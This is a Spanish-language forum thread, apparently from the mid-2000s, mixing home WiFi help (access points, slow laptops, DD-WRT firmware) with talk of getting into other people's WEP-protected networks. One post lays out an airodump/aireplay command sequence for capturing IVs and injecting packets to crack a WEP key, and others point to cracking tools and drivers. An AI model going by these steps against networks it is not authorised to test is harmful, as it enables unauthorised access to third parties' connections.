Hilo WiFi (Problemas, dudas, experiencias,...)

  • Iniciador del tema Iniciador del tema Vercetti
  • Fecha de inicio Fecha de inicio
bájate troppix y busca en google hack wireless en castellano, lo demás... leer
 
muchkin rebuznó:
Alguien puede explicar de forma sencilla y sin tanto tecnicismo para los que no son leguleyos ni profanos en el tema lo que se necesita para acceder (hard, soft) desde un portatil a una red wifi externa, porque supongo que es lo que nos pasa a muchos, detectamos una red cerca desde el portatil y nos ponemos a pensar como cojones hacerlo. Gracias a quien corresponda.

tambien puedes buscar por wardriving
 
Hola señores soy gilipollas. Si no hace falta que me digan que lo sabían con saberlo yo vale.

Wifi es el sistema de conexión sin cables que te ofrece tener diversos aparatos conectados a la red por casa no?, el sistema de conexión que usaría mi psp por ejemplo?

El caso es que aqui en asturias lo que mas implantado está es el servicio de banda ancha que da la empresa de televisión por cable telecable (a algunos les sonará familiar y a otros a chinorris). El caso es que telecable te permite tener televisión (estilo canal satelite salvo 3 o 4 canales), llamadas de teléfono e internet (2 megas o asi) por unos 70 leuros al mes mas llamadas.

La cuestión es sencilla, yo llevo varios años con ese servicio pero a mi PC no llega mas que un cable que es el que da la red al ordenador (es mas lo enciendo y ya está conectado no tengo que darle a dialers ni pijadas por el estilo). El caso es saber si este tipo de empresas ofrecen servicio wireles porque cara a la play 3 que me quiero pillar es algo que me interesa.

Tambien querria saber si me hace falta mas de un modem para usar con la play 3 y si hace falta alguna cosa mas para poder usar la PSP. Muchas Ahora mismo te bajaba los pantalones y te comía la polla a dos tiempos.
 
Ar-C-Angel rebuznó:
Hola señores soy gilipollas. Si no hace falta que me digan que lo sabían con saberlo yo vale.

Wifi es el sistema de conexión sin cables que te ofrece tener diversos aparatos conectados a la red por casa no?, el sistema de conexión que usaría mi psp por ejemplo?

El caso es que aqui en asturias lo que mas implantado está es el servicio de banda ancha que da la empresa de televisión por cable telecable (a algunos les sonará familiar y a otros a chinorris). El caso es que telecable te permite tener televisión (estilo canal satelite salvo 3 o 4 canales), llamadas de teléfono e internet (2 megas o asi) por unos 70 leuros al mes mas llamadas.

La cuestión es sencilla, yo llevo varios años con ese servicio pero a mi PC no llega mas que un cable que es el que da la red al ordenador (es mas lo enciendo y ya está conectado no tengo que darle a dialers ni pijadas por el estilo). El caso es saber si este tipo de empresas ofrecen servicio wireles porque cara a la play 3 que me quiero pillar es algo que me interesa.

Tambien querria saber si me hace falta mas de un modem para usar con la play 3 y si hace falta alguna cosa mas para poder usar la PSP. Muchas Ahora mismo te bajaba los pantalones y te comía la polla a dos tiempos.


Con un AP y una tarjeta wifi en tu pc te sería suficiente.


Presupuesto: 80 € (quizás menos)
 
Cypress-Hill rebuznó:
Ar-C-Angel rebuznó:
Hola señores soy gilipollas. Si no hace falta que me digan que lo sabían con saberlo yo vale.

Wifi es el sistema de conexión sin cables que te ofrece tener diversos aparatos conectados a la red por casa no?, el sistema de conexión que usaría mi psp por ejemplo?

El caso es que aqui en asturias lo que mas implantado está es el servicio de banda ancha que da la empresa de televisión por cable telecable (a algunos les sonará familiar y a otros a chinorris). El caso es que telecable te permite tener televisión (estilo canal satelite salvo 3 o 4 canales), llamadas de teléfono e internet (2 megas o asi) por unos 70 leuros al mes mas llamadas.

La cuestión es sencilla, yo llevo varios años con ese servicio pero a mi PC no llega mas que un cable que es el que da la red al ordenador (es mas lo enciendo y ya está conectado no tengo que darle a dialers ni pijadas por el estilo). El caso es saber si este tipo de empresas ofrecen servicio wireles porque cara a la play 3 que me quiero pillar es algo que me interesa.

Tambien querria saber si me hace falta mas de un modem para usar con la play 3 y si hace falta alguna cosa mas para poder usar la PSP. Muchas Ahora mismo te bajaba los pantalones y te comía la polla a dos tiempos.


Con un AP y una tarjeta wifi en tu pc te sería suficiente.


Presupuesto: 80 € (quizás menos)

Y un AP que viene siendo....??? :oops: :oops: :oops: :oops:
 
Punto de acceso. Básicamente sería "distribuir" la conexión a internet desde tu PC, mediante una tarjeta wireless (y una configuración sencilla) o si lo deseas (algo más caro pero mejor) comprarte un router y "distribuirlo" desde ahi.

En google:
https://www.google.es/search?client...q=configurar+AP&meta=&btnG=Búsqueda+en+Google



Es una explicación un tanto burda, pero como pareces un poco verde creo que se entenderá mejor que una explicación más técnica.
 
Yo tengo FON, como vivo en un barrio de garrulos nadie sabe que e FON por lo que tengo un WRT por 6 € y nadie me toca mi ancho de banda.

Los drivers para MAC que permiten la inyeccion de paquetes, sniffar, Kismac en modo pasivo.... es el Viah.

https://www.dopesquad.net/security

Con eso da asco crckear una WEP, solo darle a dos botones en el Kismac.
 
xxThe_ChoseNxx rebuznó:
Yo tengo FON, como vivo en un barrio de garrulos nadie sabe que e FON por lo que tengo un WRT por 6 € y nadie me toca mi ancho de banda.

Los drivers para MAC que permiten la inyeccion de paquetes, sniffar, Kismac en modo pasivo.... es el Viah.

https://www.dopesquad.net/security

Con eso da asco crckear una WEP, solo darle a dos botones en el Kismac.

Yo también he recibido mi router fon pero le he cambiado el firmware a ddwrt y ahora tengo más potencia de recepción y de emisión, además de poder y abrir puertos (que la mierda de firmware by fon no te deja, por cierto).
 
problema con el wifi...

hola soy nuevo por aqui,
tengo un problemilla con el wifi del portatil de una amiga, le va muy lento y se desconecta cada dos por tres.
su hermano usa linux en su pc (donde esta conectado el router) y ella en su portatil windows, lo digo por si tiene algo k ver... no entiendo demasiado del tema u_u...

si me podeis ayudar nos haceis un gran favor.
gracias ^^
 
Re: problema con el wifi...

darktower rebuznó:
hola soy nuevo por aqui,
tengo un problemilla con el wifi del portatil de una amiga, le va muy lento y se desconecta cada dos por tres.
su hermano usa linux en su pc (donde esta conectado el router) y ella en su portatil windows, lo digo por si tiene algo k ver... no entiendo demasiado del tema u_u...

si me podeis ayudar nos haceis un gran favor.
gracias ^^

se le desconecta o simplemente que no le cargan las paginas web?
a ver si el gachupin del hermano va a tener el emule a todo trapo comiendose todo el ancho de banda...
 
gracias por responder : )

no, su hermano no tiene ningun programa de descarga rollo emule o edonkey pk no sabe hacer k le funcionen con linux u_u

si se te ocurre alguna otra cosa comentamela, gracias.
 
¿Cual es la calidad de señal que recibe? si es de intensidad muy baja normal que se desconecte. Si el ruter está alejado de donde suele usar el pc o hay mucha pared por medio la señal se puede ir al garete.

Edito:

Para instalar en linux algo parecido al emule, puedes usar Automatix que facilita mucho la vida y para él que parece que no se le da muy bien Linux le vendrá cojonudo (porque instarlar programas P2P es bastante sencillo). Aquí te dejo un link a un minimanual de como instalarlo. Que instale el Amule mismamente, es similar al Emule.

https://www.aquilesweb.u55.biz/foro/index.php?topic=6.0

Luego para Bittorrent, pues mismamente el cliente oficial tiene soporte linux aunque yo te recomiendo el Azureus, usa java con el consiguiente consumo de recursos pero es el que mejor va, al menos a mí y he probado todos.

https://azureus.sourceforge.net/howto_linux.php

Otra opción es el MLdonkey, que integra varias redes de descarga P2P como emule y bittorrent.

Aquí hay un buen manual para su instalación.

https://bulma.net/body.phtml?nIdNoticia=2028
 
Bueno por lo que leo por todos lados, es sumamente fácil piratear una red WEP y tal... pero NADIE PONE LOS PROGRAMAS PARA PIRATEAR ESAS REDES, NI NADIE HABLA PERFECTAMENTE DE COMO USARLOS. Por ende me suena a rollo todo.

Llevo buscando por el google y por foros, y nada de nada. Mucho fácil, mucho se puede piratear pero NADA... no he visto programas con su explicación pertinente para verificar si es verdad.

Nota: yo me conecto a una red gratis que siempre está conectada. Es más, ahora mismo tengo hasta ID alta en el emule.
Nota2: Como regalo en mi otra residencia que sí tengo internet la dejo abierta y con DHCP activado. Así que no quejarse.

Ahora lo dicho, quiero usar un programa para abrir encripaticiones WEP, gracias y un saludo.
 
jorcoval rebuznó:
Para usar el primero:
https://foro.elhacker.net/index.php/topic,61344.0.html

De todas formas, es muy fácil encontrar manuales si buscas con google, pero el que te digo está bien


Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

De todas formas seguiré intentando mientras busco los que arriba nuestro amigo neo-tokyo ha dicho..
 
Darwin1889 rebuznó:
jorcoval rebuznó:
Para usar el primero:
https://foro.elhacker.net/index.php/topic,61344.0.html

De todas formas, es muy fácil encontrar manuales si buscas con google, pero el que te digo está bien


Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

De todas formas seguiré intentando mientras busco los que arriba nuestro amigo neo-tokyo ha dicho..

Te dejo la pagina que no funciona guardada en el cache de Google. Pincha aqui
 
Bien, captar una clave WEP no es tan fácil como a priori puede parecer, de hecho yo muchas veces prefiero buscar directamente una abierta.

Para empezar tienes que tener una tarjeta wifi compatible con modo monitor para capturar paquetes, una vez capturados (bastantes) exportar un archivo y como bien te han dicho con el aircrack desencriptar el archivo generado y que te sirva la wep, así a grandes rasgos, busca en el google de forma inteligente que no es tan complicado puto retarded.
 
Cypress-Hill rebuznó:
Bien, captar una clave WEP no es tan fácil como a priori puede parecer, de hecho yo muchas veces prefiero buscar directamente una abierta.

Para empezar tienes que tener una tarjeta wifi compatible con modo monitor para capturar paquetes, una vez capturados (bastantes) exportar un archivo y como bien te han dicho con el aircrack desencriptar el archivo generado y que te sirva la wep, así a grandes rasgos, busca en el google de forma inteligente que no es tan complicado puto retarded.

Mas que el modo monitor, que lo tienen el 90% de las tarjetas, lo importante es poder inyectar paquetes, puesto que donde has puesto "bastantes", mejor que digas que sin poder inyectar paquetes te puedes tirar muuuuuuuuuuuuuuuuuuuucho tiempo esperando para tener los suficientes.
 
Darwin1889 rebuznó:
Bueno por lo que leo por todos lados, es sumamente fácil piratear una red WEP y tal... pero NADIE PONE LOS PROGRAMAS PARA PIRATEAR ESAS REDES, NI NADIE HABLA PERFECTAMENTE DE COMO USARLOS. Por ende me suena a rollo todo.

man airodump

y de ahí puedes deducir lo siguiente:

(Esto es lo que hago yo, si en las webs que estrais vosotros es diferente pues vale.)

Buscas redes: airodump ath0 0
Dejas a tu tarjeta en un solo canal:
iwconfig ath0 channel "X"

Pilla IVs:
airodump ath0 captura 6 1

Tendrás que pillar por el millon de IVs

Para acelerarlo...

aireplay -1 0 ath0 -e "ESSID" -a "BSSID" -h "MAC"

-0 es el tiempo de refresco si así no tira ponle 20.

Y ahora:

aireplay -2 b "BSSID" -m 68 -n 68 -d MAC
 
Tengo el siguiente problema:

Tengo un modem THOMSON TCW719 wireless. Si configuro la red inalámbrica sin seguridad, el portatil con el que quiero acceder a internet no tiene problema en conectarse. Sin embargo si la configuro con seguridad WEP, 64 o 128 bits, al portatil se le asigna una IP que no tiene nada que ver con el modem, por lo que no se puede navegar.

¿Cuál puede ser el problema?
 
Atrás
Arriba Pie